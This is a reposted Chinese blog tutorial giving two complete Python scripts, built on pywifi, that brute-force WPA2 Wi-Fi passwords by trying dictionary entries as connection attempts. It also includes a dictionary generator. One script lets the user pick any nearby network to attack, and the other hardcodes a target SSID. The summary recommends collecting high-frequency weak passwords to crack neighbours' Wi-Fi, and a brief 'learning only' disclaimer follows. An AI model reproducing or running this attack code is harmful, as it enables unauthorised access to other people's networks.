目录
3,自己手工整理高频弱口令,不建议程序生成的字典,生成的字典成功率实在太低。
# 修正记录:2022-12-01
【破解WIF代码第一种】修正一个小错误,表现为代码执行多次后会报:ERROR Open handle failed! 错误。已修正。 并增加了尝试次数记数及显示。
效果如下图:
1,先安装Python环境(这个不用多说了吧)
2,安装PyWifi
pip install pywifi3,自己手工整理高频弱口令,不建议程序生成的字典,生成的字典成功率实在太低。
完全是在浪费时间和资源。实话实说
-
一般字典包括数字(
0-
9)、字母(a-z,区分大小写)、特殊字符(!@
#$%^&*()_+=-)
-
-
常规WPA2 wifi密码为最低
8位,且仅包括数字和小写字母,
-
所以我们可以从数字和字母组成的字符串中随机挑选出
8位(单个字符可重复出现),
-
作为wifi密码组成字典存入txt文档。
4,自己生成字典的算法:
-
import itertools
as its
-
words =
"1234567890abcdefghijklmnopqrstuvwxyz"
#可选择的字符
-
r =its.product(words,repeat=
8)
#组成8位字符串
-
dic =
open(
"pwd.txt",
"a")
#存储为wifi密码字典
-
#wifi密码完成换行,并写入txt文档
-
for i
in r:
-
dic.write(
"".join(i))
-
dic.write(
"".join(
"\n"))
-
dic.close()
5,破解WIF代码第一种(2022-12-01修正):
-
import pywifi
-
import time
-
import datetime
-
from pywifi
import const
-
-
# WiFi扫描模块
-
def
wifi_scan():
-
# 初始化wifi
-
wifi = pywifi.PyWiFi()
-
# 使用第一个无线网卡
-
interface = wifi.interfaces()[
0]
-
# 开始扫描
-
interface.scan()
-
for i
in
range(
4):
-
time.sleep(
1)
-
# print('\r扫描可用 WiFi 中,请稍后。。。(' + str(3 - i), end=')\n')
-
print(
'\r扫描可用 WiFi 中,请稍后。。。(' +
str(
3 - i)+
')')
-
print(
'\r扫描完成!\n' +
'-' *
38)
-
print(
'\r{:4}{:6}{}'.
format(
'编号',
'信号强度',
'wifi名'))
-
# 扫描结果,scan_results()返回一个集,存放的是每个wifi对象
-
bss = interface.scan_results()
-
# 存放wifi名的集合
-
wifi_name_set =
set()
-
for w
in bss:
-
# 解决乱码问题
-
wifi_name_and_signal = (
100 + w.signal, w.ssid.encode(
'raw_unicode_escape').decode(
'utf-8'))
-
wifi_name_set.add(wifi_name_and_signal)
-
# 存入列表并按信号排序
-
wifi_name_list =
list(wifi_name_set)
-
wifi_name_list =
sorted(wifi_name_list, key=
lambda a: a[
0], reverse=
True)
-
num =
0
-
# 格式化输出
-
while num <
len(wifi_name_list):
-
print(
'\r{:<6d}{:<8d}{}'.
format(num, wifi_name_list[num][
0], wifi_name_list[num][
1]))
-
num +=
1
-
print(
'-' *
38)
-
# 返回wifi列表
-
return wifi_name_list
-
-
-
# WIFI破解模块
-
def
wifi_password_crack(
wifi_name):
-
# 字典路径
-
dic_path =
input(
"请输入本地用于WIFI暴力破解的密码字典(txt格式,每个密码占据1行)的路径:")
-
if dic_path ==
"": dic_path =
"pwd.txt"
-
# 打开文件
-
# file = open(dic_path, "r")
-
start = datetime.datetime.now()
-
iCount =
0
-
# 创建wifi对象
-
wifi = pywifi.PyWiFi()
-
# 创建网卡对象,为第一个wifi网卡
-
interface = wifi.interfaces()[
0]
-
with
open(dic_path,
'r')
as f:
-
# 遍历密码
-
for pwd
in f:
-
# 去除密码的末尾换行符
-
pwd = pwd.strip(
'\n')
-
# ERROR Open handle failed!将这创建对象过程移到上面,防止多次执行时报错
-
# 创建wifi对象
-
# wifi = pywifi.PyWiFi()
-
# 创建网卡对象,为第一个wifi网卡
-
# interface = wifi.interfaces()[0]
-
# 断开所有wifi连接
-
interface.disconnect()
-
# 等待其断开
-
while interface.status() ==
4:
-
# 当其处于连接状态时,利用循环等待其断开
-
pass
-
# 创建连接文件(对象)
-
profile = pywifi.Profile()
-
# wifi名称
-
profile.ssid = wifi_name
-
# 需要认证
-
profile.auth = const.AUTH_ALG_OPEN
-
# wifi默认加密算法
-
profile.akm.append(const.AKM_TYPE_WPA2PSK)
-
profile.cipher = const.CIPHER_TYPE_CCMP
-
# wifi密码
-
profile.key = pwd
-
# 删除所有wifi连接文件
-
interface.remove_all_network_profiles()
-
# 设置新的wifi连接文件
-
tmp_profile = interface.add_network_profile(profile)
-
# 开始尝试连接
-
interface.connect(tmp_profile)
-
#start_time = time.time()
-
time.sleep(
1.5)
-
#while time.time() - start_time < 1.5:
-
# 接口状态为4代表连接成功(当尝试时间大于1.5秒之后则为错误密码,经测试测正确密码一般都在1.5秒内连接,若要提高准确性可以设置为2s或以上,相应暴力破解速度就会变慢)
-
if interface.status() == const.IFACE_CONNECTED:
-
print(
f'\r连接成功!密码为:{pwd}')
-
m, s =
divmod((end - start).seconds,
60)
-
h, m =
divmod(m,
60)
-
print(
f"本次破解WIFI密码共用时:{h}时{m}分{s}秒")
-
exit(
0)
-
else:
-
print(
f'\r[{iCount}]正在利用密码 {pwd} 尝试...')
-
end = datetime.datetime.now()
-
iCount= iCount+
1
-
# 主函数
-
def
main():
-
# 退出标致
-
exit_flag =
0
-
# 目标编号
-
target_num = -
1
-
while
not exit_flag:
-
try:
-
print(
'WIFI破解'.center(
35,
'-'))
-
# 调用扫描模块,返回一个排序后的wifi列表
-
wifi_list = wifi_scan()
-
# 让用户选择要破解的wifi编号,并对用户输入的编号进行判断和异常处理
-
choose_exit_flag =
0
-
while
not choose_exit_flag:
-
try:
-
target_num =
int(
input(
'请选择你要尝试破解的wifi:'))
-
# 如果要选择的wifi编号在列表内,继续二次判断,否则重新输入
-
if target_num
in
range(
len(wifi_list)):
-
# 二次确认
-
while
not choose_exit_flag:
-
try:
-
choose =
str(
input(
f'你选择要破解的WiFi名称是:{wifi_list[target_num][1]},确定吗?(Y/N)'))
-
# 对用户输入进行小写处理,并判断
-
if choose.lower() ==
'y':
-
choose_exit_flag =
1
-
elif choose.lower() ==
'n':
-
break
-
# 处理用户其它字母输入
-
else:
-
print(
'只能输入 Y/N')
-
# 处理用户非字母输入
-
except ValueError:
-
print(
'只能输入 Y/N')
-
# 退出破解
-
if choose_exit_flag ==
1:
-
break
-
else:
-
print(
'请重新输入')
-
except ValueError:
-
print(
'只能输入数字')
-
# 密码破解,传入用户选择的wifi名称
-
wifi_password_crack(wifi_list[target_num][
1])
-
print(
'-' *
38)
-
exit_flag =
1
-
except Exception
as e:
-
print(e)
-
raise e
-
-
-
if __name__ ==
'__main__':
-
main()
6,破解WIF代码第二种:
-
import pywifi
-
from pywifi
import const
-
import time
-
import datetime
-
-
# 测试连接,返回链接结果
-
def
wifiConnect(
pwd):
-
# 抓取网卡接口
-
wifi = pywifi.PyWiFi()
-
# 获取第一个无线网卡
-
ifaces = wifi.interfaces()[
0]
-
# 断开所有连接
-
ifaces.disconnect()
-
time.sleep(
1)
-
wifistatus = ifaces.status()
-
if wifistatus == const.IFACE_DISCONNECTED:
-
# 创建WiFi连接文件
-
profile = pywifi.Profile()
-
# 要连接WiFi的名称
-
profile.ssid =
"TP_LINK_44D0"
-
# 网卡的开放状态
-
profile.auth = const.AUTH_ALG_OPEN
-
# wifi加密算法,一般wifi加密算法为wps
-
profile.akm.append(const.AKM_TYPE_WPA2PSK)
-
# 加密单元
-
profile.cipher = const.CIPHER_TYPE_CCMP
-
# 调用密码
-
profile.key = pwd
-
# 删除所有连接过的wifi文件
-
ifaces.remove_all_network_profiles()
-
# 设定新的连接文件
-
tep_profile = ifaces.add_network_profile(profile)
-
ifaces.connect(tep_profile)
-
# wifi连接时间
-
time.sleep(
2)
-
if ifaces.status() == const.IFACE_CONNECTED:
-
return
True
-
else:
-
return
False
-
else:
-
print(
"已有wifi连接")
-
-
-
# 读取密码本
-
def
readPassword():
-
success =
False
-
print(
"****************** WIFI破解 ******************")
-
# 密码本路径
-
path =
"pwd.txt"
-
# 打开文件
-
file =
open(path,
"r")
-
start = datetime.datetime.now()
-
while
True:
-
try:
-
pwd = file.readline()
-
# 去除密码的末尾换行符
-
pwd = pwd.strip(
'\n')
-
bool = wifiConnect(pwd)
-
if
bool:
-
print(
"[*] 密码已破解:", pwd)
-
print(
"[*] WiFi已自动连接!!!")
-
success =
True
-
break
-
else:
-
# 跳出当前循环,进行下一次循环
-
print(
"正在破解 SSID 为 %s 的 WIFI密码,当前校验的密码为:%s"%(
"TP_LINK_44D0",pwd))
-
except:
-
continue
-
end = datetime.datetime.now()
-
if(success):
-
print(
"[*] 本次破解WIFI密码一共用了多长时间:{}".
format(end - start))
-
else:
-
print(
"[*] 很遗憾未能帮你破解出当前指定WIFI的密码,请更换密码字典后重新尝试!")
-
exit(
0)
-
-
-
if __name__==
"__main__":
-
readPassword()
7,执行破解成功效果截图(成功连接):
8,总结:
实话告诉你,现在WPA2 WIF密码破解成功的概率基本为0,不要妄想可以通过一段脚本就独步天下。哈哈,那是不可能的。WPA2的加密方式决定了密码是基本不可能被破解的。但是。不可能被破解,不代表不能被尝试验证。尝试是需要代价的,一次密码尝试至少需要1.5秒时间。所以。如果想用跑字典方式来破解周边WIFI。我认为只需要手工整理1000-10000个左右>=8的全网高频弱口令密码即可。跑起来也快。成不成就这几下子。据有关组织统计。10000个高频密码基本可以涵盖全网60%的密码。真有这么高的概率。信不信由你。
9,温馨提示。
代码仅供学习用途。勿用于非法用途!
转载:https://blog.csdn.net/wh445306/article/details/128080090
查看评论